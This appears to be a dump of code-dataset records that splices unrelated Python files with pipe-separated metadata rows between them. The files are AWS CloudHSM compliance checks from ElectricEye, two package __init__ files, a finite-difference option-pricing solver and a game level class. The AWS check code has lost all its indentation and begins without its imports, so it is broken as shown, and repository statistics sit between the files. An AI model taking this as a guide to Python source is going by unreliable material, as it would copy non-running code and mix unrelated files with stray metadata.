def cloudhsm_cluster_degradation_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[CloudHsm.1] CloudHsm clusters should not be degraded"""
hsm_clusters = describe_clusters(cache=cache)
iso8601Time = datetime.datetime.now(datetime.timezone.utc).isoformat()
for clstr in hsm_clusters["Clusters"]:
ClusterId = clstr["ClusterId"]
if clstr["State"] != "DEGRADED":
#Passing Check
finding = {
"SchemaVersion": "2018-10-08",
"Id": ClusterId + "/cloudhsm-cluster-degradation-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": ClusterId,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[CloudHsm.1] CloudHsm clusters should not be in a degraded state",
"Description": f"CloudHSM cluster {ClusterId} is not in a degraded state",
"Remediation": {
"Recommendation": {
"Text": "For more information on HSM Clusters refer to the AWS CloudHsm User Guide on managing cloudhsm clusters",
"Url": "https://docs.aws.amazon.com/cloudhsm/latest/userguide/manage-clusters.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCloudHsmCluster",
"Id": ClusterId,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"AwsCloudHsmCluster": {"ClusterId": ClusterId}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF DE.AE-2",
"NIST CSF DE.AE-3",
"NIST CSF DE.AE-5",
"NIST CSF DE.CM-1",
"NIST CSF DE.DP-2",
"NIST SP 800-53 AC-2",
"NIST SP 800-53 AU-6",
"NIST SP 800-53 AU-12",
"NIST SP 800-53 IR-5",
"NIST SP 800-53 IR-6",
"AICPA TSC CC4.1",
"AICPA TSC CC5.1",
"ISO 27001:2013 A.10.1.2",
"ISO 27001:2013 A.12.4.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": ClusterId + "/cloudhsm-cluster-degradation-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": ClusterId,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "HIGH"},
"Confidence": 99,
"Title": "[CloudHsm.1] CloudHsm clusters should not be in a degraded state",
"Description": f"CloudHSM cluster {ClusterId} is in a degraded state",
"Remediation": {
"Recommendation": {
"Text": "For more information on HSM Clusters refer to the AWS CloudHsm User Guide on managing cloudhsm clusters",
"Url": "https://docs.aws.amazon.com/cloudhsm/latest/userguide/manage-clusters.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCloudHsmCluster",
"Id": ClusterId,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"AwsCloudHsmCluster": {"ClusterId": ClusterId}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF DE.AE-2",
"NIST CSF DE.AE-3",
"NIST CSF DE.AE-5",
"NIST CSF DE.CM-1",
"NIST CSF DE.DP-2",
"NIST SP 800-53 AC-2",
"NIST SP 800-53 AU-6",
"NIST SP 800-53 AU-12",
"NIST SP 800-53 IR-5",
"NIST SP 800-53 IR-6",
"AICPA TSC CC4.1",
"AICPA TSC CC5.1",
"ISO 27001:2013 A.10.1.2",
"ISO 27001:2013 A.12.4.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
@registry.register_check("cloudhsm")
def cloudhsm_hsm_degradation_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[CloudHsm.2] CloudHsm HSMs should not be degraded"""
hsm_clusters = describe_clusters(cache=cache)
iso8601Time = datetime.datetime.now(datetime.timezone.utc).isoformat()
for clstr in hsm_clusters["Clusters"]:
ClusterId = clstr["ClusterId"]
for hsm in clstr['Hsms']:
HsmId = hsm['HsmId']
if hsm["State"] != "DEGRADED":
#Passing Check
finding = {
"SchemaVersion": "2018-10-08",
"Id": HsmId + "/cloudhsm-cluster-degradation-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": HsmId,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[CloudHsm.2] CloudHsm HSMs should not be in a degraded state",
"Description": f"CloudHSM HSM {HsmId} is not in a degraded state",
"Remediation": {
"Recommendation": {
"Text": "For more information on HSM Clusters refer to the AWS CloudHsm User Guide on managing Hsms",
"Url": "https://docs.aws.amazon.com/cloudhsm/latest/userguide/introduction.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCloudHsmHsm",
"Id": HsmId,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"AwsCloudHsmHsm": {"HsmId": HsmId}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF DE.AE-2",
"NIST CSF DE.AE-3",
"NIST CSF DE.AE-5",
"NIST CSF DE.CM-1",
"NIST CSF DE.DP-2",
"NIST SP 800-53 AC-2",
"NIST SP 800-53 AU-6",
"NIST SP 800-53 AU-12",
"NIST SP 800-53 IR-5",
"NIST SP 800-53 IR-6",
"AICPA TSC CC4.1",
"AICPA TSC CC5.1",
"ISO 27001:2013 A.10.1.2",
"ISO 27001:2013 A.12.4.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": HsmId + "/cloudhsm-cluster-degradation-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": HsmId,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "HIGH"},
"Confidence": 99,
"Title": "[CloudHsm.2] CloudHsm HSMs should not be in a degraded state",
"Description": f"CloudHSM HSM {HsmId} is in a degraded state",
"Remediation": {
"Recommendation": {
"Text": "For more information on HSM Clusters refer to the AWS CloudHsm User Guide on managing Hsms",
"Url": "https://docs.aws.amazon.com/cloudhsm/latest/userguide/introduction.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCloudHsmHsm",
"Id": HsmId,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"AwsCloudHsmHsm": {"HsmId": HsmId}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF DE.AE-2",
"NIST CSF DE.AE-3",
"NIST CSF DE.AE-5",
"NIST CSF DE.CM-1",
"NIST CSF DE.DP-2",
"NIST SP 800-53 AC-2",
"NIST SP 800-53 AU-6",
"NIST SP 800-53 AU-12",
"NIST SP 800-53 IR-5",
"NIST SP 800-53 IR-6",
"AICPA TSC CC4.1",
"AICPA TSC CC5.1",
"ISO 27001:2013 A.10.1.2",
"ISO 27001:2013 A.12.4.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
@registry.register_check("cloudhsm")
def cloudhsm_cluster_backup_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[CloudHsm.3] CloudHsm clusters should have at least 1 backup in a READY state"""
hsm_clusters = describe_clusters(cache=cache)
iso8601Time = datetime.datetime.now(datetime.timezone.utc).isoformat()
for clstr in hsm_clusters["Clusters"]:
ClusterId = clstr["ClusterId"]
backups = cloudhsm.describe_backups(
Filters = {
'clusterIds': [ClusterId]
}
)
activeBackups = [x for x in backups['Backups'] if x['BackupState'] == 'READY']
if len(activeBackups) > 0:
#Passing Check
finding = {
"SchemaVersion": "2018-10-08",
"Id": ClusterId + "/cloudhsm-cluster-backup-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": ClusterId,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[CloudHsm.3] CloudHsm clusters should have at least 1 backup in a READY state",
"Description": f"CloudHSM cluster {ClusterId} has at least 1 backup in a READY state",
"Remediation": {
"Recommendation": {
"Text": "For more information on HSM Clusters refer to the AWS CloudHsm User Guide on managing Backups",
"Url": "https://docs.aws.amazon.com/cloudhsm/latest/userguide/backups.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCloudHsmCluster",
"Id": ClusterId,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"AwsCloudHsmCluster": {"ClusterId": ClusterId}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF DE.AE-2",
"NIST CSF DE.AE-3",
"NIST CSF DE.AE-5",
"NIST CSF DE.CM-1",
"NIST CSF DE.DP-2",
"NIST SP 800-53 AC-2",
"NIST SP 800-53 AU-6",
"NIST SP 800-53 AU-12",
"NIST SP 800-53 IR-5",
"NIST SP 800-53 IR-6",
"AICPA TSC CC4.1",
"AICPA TSC CC5.1",
"ISO 27001:2013 A.10.1.2",
"ISO 27001:2013 A.12.4.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": ClusterId + "/cloudhsm-cluster-backup-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": ClusterId,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "HIGH"},
"Confidence": 99,
"Title": "[CloudHsm.3] CloudHsm clusters should have at least 1 backup in a READY state",
"Description": f"CloudHSM cluster {ClusterId} does not have at least 1 backup in a READY state",
"Remediation": {
"Recommendation": {
"Text": "For more information on HSM Clusters refer to the AWS CloudHsm User Guide on managing Backups",
"Url": "https://docs.aws.amazon.com/cloudhsm/latest/userguide/backups.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCloudHsmCluster",
"Id": ClusterId,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"AwsCloudHsmCluster": {"ClusterId": ClusterId}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF DE.AE-2",
"NIST CSF DE.AE-3",
"NIST CSF DE.AE-5",
"NIST CSF DE.CM-1",
"NIST CSF DE.DP-2",
"NIST SP 800-53 AC-2",
"NIST SP 800-53 AU-6",
"NIST SP 800-53 AU-12",
"NIST SP 800-53 IR-5",
"NIST SP 800-53 IR-6",
"AICPA TSC CC4.1",
"AICPA TSC CC5.1",
"ISO 27001:2013 A.10.1.2",
"ISO 27001:2013 A.12.4.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding | 46.83455 | 138 | 0.444698 | 1,608 | 19,249 | 5.30597 | 0.140547 | 0.024613 | 0.031646 | 0.038678 | 0.867206 | 0.867206 | 0.867206 | 0.857361 | 0.857361 | 0.856892 | 0 | 0.052993 | 0.447088 | 19,249 | 411 | 139 | 46.83455 | 0.748661 | 0.053301 | 0 | 0.816 | 0 | 0.005333 | 0.371303 | 0.040022 | 0 | 0 | 0 | 0 | 0 | 1 | 0.010667 | false | 0.008 | 0.013333 | 0 | 0.029333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
51b3251dc404c6a7d4d91588f4fa53a63dc7f8cb | 302 | py | Python | authApp/views/__init__.py | xlausae/4a-docs | e2d1038153f170d32d8edbe5ac3fe616ef554206 | [
"MIT"
] | 1 | 2021-11-29T14:17:07.000Z | 2021-11-29T14:17:07.000Z | authApp/views/__init__.py | xlausae/4a-docs | e2d1038153f170d32d8edbe5ac3fe616ef554206 | [
"MIT"
] | 2 | 2021-11-18T17:09:21.000Z | 2021-11-19T21:59:11.000Z | authApp/views/__init__.py | xlausae/4a-docs | e2d1038153f170d32d8edbe5ac3fe616ef554206 | [
"MIT"
] | 1 | 2021-11-18T03:19:28.000Z | 2021-11-18T03:19:28.000Z | from .userCreateView import UserCreateView
from .userDetailView import UserDetailView
from .verifyTokenView import VerifyTokenView
from .ProductView import ProductCreateView
from .ProductView import ProductDeleteView
from .ProductView import ProductReadView
from .ProductView import ProductUpdateView
| 33.555556 | 44 | 0.880795 | 28 | 302 | 9.5 | 0.357143 | 0.225564 | 0.315789 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096026 | 302 | 8 | 45 | 37.75 | 0.974359 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
51e7b69647dc04aaef791f5c9f3fd049aa4e2c5d | 131 | py | Python | pyoculus/problems/__init__.py | mbkumar/pyoculus | 8c925b139e27fd016b37aa4fe4653276af67e0a5 | [
"MIT"
] | 4 | 2020-09-24T12:14:13.000Z | 2022-02-09T12:12:51.000Z | pyoculus/problems/__init__.py | mbkumar/pyoculus | 8c925b139e27fd016b37aa4fe4653276af67e0a5 | [
"MIT"
] | 1 | 2021-03-04T16:46:25.000Z | 2021-03-04T16:46:25.000Z | pyoculus/problems/__init__.py | mbkumar/pyoculus | 8c925b139e27fd016b37aa4fe4653276af67e0a5 | [
"MIT"
] | 4 | 2020-07-24T16:09:15.000Z | 2021-03-04T15:56:07.000Z | from .base_problem import *
from .spec_problem import *
from .spec_bfield import *
from .spec_pjh import *
from .two_waves import * | 26.2 | 27 | 0.778626 | 20 | 131 | 4.85 | 0.45 | 0.412371 | 0.43299 | 0.43299 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.145038 | 131 | 5 | 28 | 26.2 | 0.866071 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
cf9b4559395bbaf3d8538ae8d34596ab67be4d05 | 6,271 | py | Python | Semester 7/Computational Finance (MA 473)/Term Paper - Python/CCDScheme.py | Imperial-lord/IITG | df4233905d2954511d5b16666f0d44cc38b9df90 | [
"MIT"
] | 4 | 2021-03-02T03:58:55.000Z | 2022-03-28T13:38:05.000Z | Semester 7/Computational Finance (MA 473)/Term Paper - Python/CCDScheme.py | Imperial-lord/IITG | df4233905d2954511d5b16666f0d44cc38b9df90 | [
"MIT"
] | null | null | null | Semester 7/Computational Finance (MA 473)/Term Paper - Python/CCDScheme.py | Imperial-lord/IITG | df4233905d2954511d5b16666f0d44cc38b9df90 | [
"MIT"
] | 4 | 2021-02-04T17:44:23.000Z | 2022-03-28T13:38:09.000Z | import numpy as np
from compositeBoole import compositeBool
from findUInitial import findUInitial
from findVWInitial import findVWInitial
from g import g
def findCCDScheme(u_n, v_n, w_n, N, M, b, T, r, lambda_val, sigma, nu, eta):
h = 2*b/M
k = T/N
x = np.arange(-b, b+h, h)
B = np.zeros(3*M+3)
A = np.zeros((3*M+3, 3*M+3))
for i in range(0, 3*M-3):
i1 = int((i+3)/3)
if i % 3 == 2:
gamma = compositeBool(u_n, M, b, r, lambda_val, sigma, nu, eta, i1)
B[i] = u_n[i1] + k*sigma*sigma/4*w_n[i1] + k*lambda_val*gamma/2
elif i % 3 == 0:
B[i] = -v_n[i1]
else:
B[i] = 0
gamma = compositeBool(u_n, M, b, r, lambda_val, sigma, nu, eta, 0)
B[3*M-3] = u_n[0] + k*sigma*sigma/4*w_n[0] + k*lambda_val*gamma/2
gamma = compositeBool(u_n, M, b, r, lambda_val, sigma, nu, eta, M)
B[3*M-2] = u_n[M] + k*sigma*sigma/4*w_n[M] + k*lambda_val*gamma/2
for i in range(0, 3*M-3):
i1 = int((i+3)/3)
if i % 3 == 2:
A[i][i1] = 1
A[i][2*M+2+i1] = -k*sigma*sigma/4
A[i][0] += (2*h/45) * (-k*lambda_val/2) * 7 * \
g(-b-x[i1], r, lambda_val, sigma, nu, eta)
A[i][M] += (2*h/45) * (-k*lambda_val/2) * 7 * \
g(b-x[i1], r, lambda_val, sigma, nu, eta)
for l in range(0, int(M/4)-1):
A[i][4*l+1] += (2*h/45) * (-k*lambda_val/2) * 32 * \
g(x[4*l+1]-x[i1], r, lambda_val, sigma, nu, eta)
A[i][4*l+2] += (2*h/45) * (-k*lambda_val/2) * 12 * \
g(x[4*l+2]-x[i1], r, lambda_val, sigma, nu, eta)
A[i][4*l+3] += (2*h/45) * (-k*lambda_val/2) * 32 * \
g(x[4*l+3]-x[i1], r, lambda_val, sigma, nu, eta)
A[i][4*l+4] += (2*h/45) * (-k*lambda_val/2) * 14 * \
g(x[4*l+4]-x[i1], r, lambda_val, sigma, nu, eta)
A[i][M-3] += (2*h/45) * (-k*lambda_val/2) * 32 * \
g(x[M-3]-x[i1], r, lambda_val, sigma, nu, eta)
A[i][M-2] += (2*h/45) * (-k*lambda_val/2) * 12 * \
g(x[M-2]-x[i1], r, lambda_val, sigma, nu, eta)
A[i][M-1] += (2*h/45) * (-k*lambda_val/2) * 32 * \
g(x[M-1]-x[i1], r, lambda_val, sigma, nu, eta)
elif i % 3 == 0:
A[i][i1-1] = (15/(16*h))
A[i][i1+1] = -(15/(16*h))
A[i][M+1+i1-1] = 7/16
A[i][M+1+i1+1] = 7/16
A[i][2*M+2+i1-1] = h/16
A[i][2*M+2+i1+1] = -h/16
else:
A[i][i1-1] = 3/(h*h)
A[i][i1] = -6/(h*h)
A[i][i1+1] = 3/(h*h)
A[i][M+1+i1-1] = 9/(8*h)
A[i][M+1+i1+1] = -9/(8*h)
A[i][2*M+2+i1-1] = 1/8
A[i][2*M+2+i1] = -1
A[i][2*M+2+i1+1] = 1/8
A[3*M-3][0] = 1
A[3*M-3][2*M+2] = -k*sigma*sigma/4
A[3*M-3][0] += (2*h/45) * (-k*lambda_val/2) * 7 * \
g(-b-x[0], r, lambda_val, sigma, nu, eta)
A[3*M-3][M] += (2*h/45) * (-k*lambda_val/2) * 7 * \
g(b-x[0], r, lambda_val, sigma, nu, eta)
for l in range(0, int(M/4)-1):
A[3*M-3][4*l+1] += (2*h/45) * (-k*lambda_val/2) * \
32 * g(x[4*l+1]-x[0], r, lambda_val, sigma, nu, eta)
A[3*M-3][4*l+2] += (2*h/45) * (-k*lambda_val/2) * \
12 * g(x[4*l+2]-x[0], r, lambda_val, sigma, nu, eta)
A[3*M-3][4*l+3] += (2*h/45) * (-k*lambda_val/2) * \
32 * g(x[4*l+3]-x[0], r, lambda_val, sigma, nu, eta)
A[3*M-3][4*l+4] += (2*h/45) * (-k*lambda_val/2) * \
14 * g(x[4*l+4]-x[0], r, lambda_val, sigma, nu, eta)
A[3*M-3][M-3] += (2*h/45) * (-k*lambda_val/2) * 32 * \
g(x[M-3]-x[0], r, lambda_val, sigma, nu, eta)
A[3*M-3][M-2] += (2*h/45) * (-k*lambda_val/2) * 12 * \
g(x[M-2]-x[0], r, lambda_val, sigma, nu, eta)
A[3*M-3][M-1] += (2*h/45) * (-k*lambda_val/2) * 32 * \
g(x[M-1]-x[0], r, lambda_val, sigma, nu, eta)
# FOR j=M
A[3*M-2][M] = 1
A[3*M-2][2*M+2+M] = -k*sigma*sigma/4
A[3*M-2][0] += (2*h/45) * (-k*lambda_val/2) * 7 * \
g(-b-x[M], r, lambda_val, sigma, nu, eta)
A[3*M-2][M] += (2*h/45) * (-k*lambda_val/2) * 7 * \
g(b-x[M], r, lambda_val, sigma, nu, eta)
for l in range(0, int(M/4)-1):
A[3*M-2][4*l+1] += (2*h/45) * (-k*lambda_val/2) * \
32 * g(x[4*l+1]-x[M], r, lambda_val, sigma, nu, eta)
A[3*M-2][4*l+2] += (2*h/45) * (-k*lambda_val/2) * \
12 * g(x[4*l+2]-x[M], r, lambda_val, sigma, nu, eta)
A[3*M-2][4*l+3] += (2*h/45) * (-k*lambda_val/2) * \
32 * g(x[4*l+3]-x[M], r, lambda_val, sigma, nu, eta)
A[3*M-2][4*l+4] += (2*h/45) * (-k*lambda_val/2) * \
14 * g(x[4*l+4]-x[M], r, lambda_val, sigma, nu, eta)
A[3*M-2][M-3] += (2*h/45) * (-k*lambda_val/2) * 32 * \
g(x[M-3]-x[M], r, lambda_val, sigma, nu, eta)
A[3*M-2][M-2] += (2*h/45) * (-k*lambda_val/2) * 12 * \
g(x[M-2]-x[M], r, lambda_val, sigma, nu, eta)
A[3*M-2][M-1] += (2*h/45) * (-k*lambda_val/2) * 32 * \
g(x[M-1]-x[M], r, lambda_val, sigma, nu, eta)
A[3*M-1][0] = 31/h
A[3*M-1][1] = -32/h
A[3*M-1][2] = 1/h
A[3*M-1][M+1] = 14
A[3*M-1][M+1+1] = 16
A[3*M-1][2*M+2] = 2*h
A[3*M-1][2*M+2+1] = -4*h
A[3*M][M] = -31/h
A[3*M][M-1] = 32/h
A[3*M][M-2] = -1/h
A[3*M][M+1+M] = 14
A[3*M][M+1+M-1] = 16
A[3*M][2*M+2+M] = -2*h
A[3*M][2*M+2+M-1] = 4*h
A[3*M+1][0] = 7/(2*h)
A[3*M+1][1] = -8/(2*h)
A[3*M+1][2] = 1/(2*h)
A[3*M+1][M+1] = 1
A[3*M+1][M+1+1] = 2
A[3*M+1][2*M+2+1] = -h
A[3*M+2][M] = -7/(2*h)
A[3*M+2][M-1] = 8/(2*h)
A[3*M+2][M-2] = -1/(2*h)
A[3*M+2][M+1+M] = 1
A[3*M+2][M+1+M-1] = 2
A[3*M+2][2*M+2+M-1] = h
X = np.matmul(np.linalg.inv(A), B)
u_n1 = X[0:M+1]
v_n1 = X[M+1:2*M+2]
w_n1 = X[2*M+2:]
print(np.linalg.norm(np.matmul(A, X) - B))
return u_n1, v_n1, w_n1
u_n = findUInitial(1.5, 3/128, 100, -0.9, 0.45, 0.05, 0.15, 0.1, 'call')
v_n, w_n = findVWInitial(u_n, 3/128, 128)
for i in range(0, 25):
u_n, v_n, w_n = findCCDScheme(
u_n, v_n, w_n, 25, 128, 1.5, 0.25, 0.05, 0.1, 0.15, -0.9, 0.45)
# print(u_n[60])
| 35.630682 | 79 | 0.425929 | 1,415 | 6,271 | 1.823322 | 0.05159 | 0.212791 | 0.055814 | 0.180233 | 0.836822 | 0.786047 | 0.737209 | 0.679457 | 0.645736 | 0.613566 | 0 | 0.141093 | 0.302663 | 6,271 | 175 | 80 | 35.834286 | 0.448891 | 0.003508 | 0 | 0.090909 | 0 | 0 | 0.00064 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.006993 | false | 0 | 0.034965 | 0 | 0.048951 | 0.006993 | 0 | 0 | 1 | null | 1 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
cfefb28b8cae3cf7795ea01c1036b0f5d2001264 | 8,180 | py | Python | LEVELS.py | TaliSman1007/meta2.5D | f29ba8ae58f977a92fa207ab6320ab029a50de24 | [
"CC0-1.0"
] | null | null | null | LEVELS.py | TaliSman1007/meta2.5D | f29ba8ae58f977a92fa207ab6320ab029a50de24 | [
"CC0-1.0"
] | null | null | null | LEVELS.py | TaliSman1007/meta2.5D | f29ba8ae58f977a92fa207ab6320ab029a50de24 | [
"CC0-1.0"
] | null | null | null | #Level classes for DUGA
import SETTINGS
class Level:
def __init__(self, stats):
self.stats = stats
self.lvl_number = stats['lvl_number']
self.sky_color = stats['sky_color']
self.ground_color = stats['ground_color']
self.npcs = stats['npcs']
self.items = stats['items']
self.player_pos = stats['player_pos']
self.array = stats['array']
self.shade = stats['shade'][0]
self.shade_rgba = stats['shade'][1]
self.shade_visibility = stats['shade'][2]
if 'name' in stats:
self.name = stats['name']
if 'author' in stats:
self.author = stats['author']
##SETTINGS.levels_list.append(Level({
##'ground_color' : (255, 255, 255),
##'npcs' : [((4, 4), 90, 7)],
##'player_pos' : [1,2],
##'name' : None,
##'sky_color' : (255, 255, 255),
##'lvl_number' : 0,
##'shade' : (False, (0, 0, 0, 0), 0),
##'array' : [[1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [1, 0, 0, 0, 0, 0, 0, 0, 0, 1], [1, 0, 0, 0, 0, 0, 0, 0, 0, 1], [1, 0, 0, 0, 0, 0, 0, 0, 0, 1], [1, 0, 0, 0, 0, 0, 0, 0, 0, 1], [1, 0, 0, 0, 0, 0, 0, 0, 0, 1], [1, 0, 0, 0, 0, 0, 0, 0, 0, 1], [1, 0, 0, 0, 0, 0, 0, 0, 0, 1], [1, 0, 0, 0, 0, 0, 0, 0, 0, 1], [1, 1, 1, 1, 1, 1, 1, 1, 1, 1]],
##'items' : [((3,3), 13)],
##}))
##SETTINGS.levels_list.append(Level({
## 'lvl_number' : 0,
## 'sky_color' : SETTINGS.GRAY,
## 'ground_color': SETTINGS.LIGHTGRAY,
## 'npcs' : [([2,3], 270, 4), ([3,3], 270, 5)],#, ([3,3], 270, 3), ([4,3], 270, 3), ([1,3], 270, 3)],
## 'items' : [([1,1], 2), ([2,1], 3), ([3,1], 7), ([4, 1], 6), ([4,2], 8), ([3,2], 9), ([1,2], 11)],
## 'player_pos' : [2,2],
## 'shade' : (False, (0,0,0,0), 0),
## 'array' : [
## #0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8
## [1,1,1,1,1,1],
## [1,0,0,0,0,1],
## [1,0,0,0,0,1],
## [1,0,0,0,0,1],
## [1,0,0,0,0,1],
## [1,1,5,1,1,1]
## ]}))
##SETTINGS.levels_list.append(Level({
## 'lvl_number' : 1,
## 'sky_color' : SETTINGS.GRAY,
## 'ground_color': SETTINGS.BROWN,
## 'npcs' : [([2,6], 270, 4), ([10,10], 180, 1), ([17, 9], 180, 0)],
## 'items' : [([8,2], 8), ([2,7], 5), ([13,4], 0), ([10, 5], 2), ([12, 12], 2), ([16, 8], 1), ([16, 11], 0)],
## 'player_pos' : [6,1],
## 'shade' : (True, (0,0,0,0), 500),
## 'array' : [
## #0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8
## [0,0,0,0,0,1,1,2,1,0,0,0,0,0,0,0,0,0,0],
## [0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0],
## [0,0,0,0,1,0,0,8,0,1,0,0,0,0,0,0,0,0,0],
## [0,0,0,0,0,1,1,6,1,1,1,2,1,1,0,0,0,0,0],
## [0,0,0,0,1,0,0,0,0,0,0,1,0,0,1,0,0,0,0],
## [0,5,5,5,1,0,8,0,0,0,0,1,8,0,1,0,0,0,0],
## [1,0,0,0,1,0,0,1,1,6,1,1,10,1,0,0,0,0,0],
## [2,0,8,0,1,0,0,1,7,0,0,0,0,0,1,5,2,5,0],
## [1,0,0,0,1,0,0,1,0,0,0,0,0,0,1,0,0,0,5],
## [0,1,1,0,1,0,0,1,1,1,3,1,1,1,1,0,0,0,3],
## [0,0,1,0,7,0,0,0,0,0,8,0,0,0,7,0,8,0,5],
## [0,0,1,1,1,7,0,1,1,1,1,1,1,6,1,0,0,0,5],
## [0,0,0,0,0,1,1,0,5,7,0,8,0,0,1,5,5,5,0],
## [0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0],
## [0,0,0,0,0,0,0,0,0,0,1,2,1,1,0,0,0,0,0],
## ]}))
##SETTINGS.levels_list.append(Level({
##'items' : [((2, 1), 7), ((1, 2), 1), ((2, 2), 3), ((3, 2), 3)],
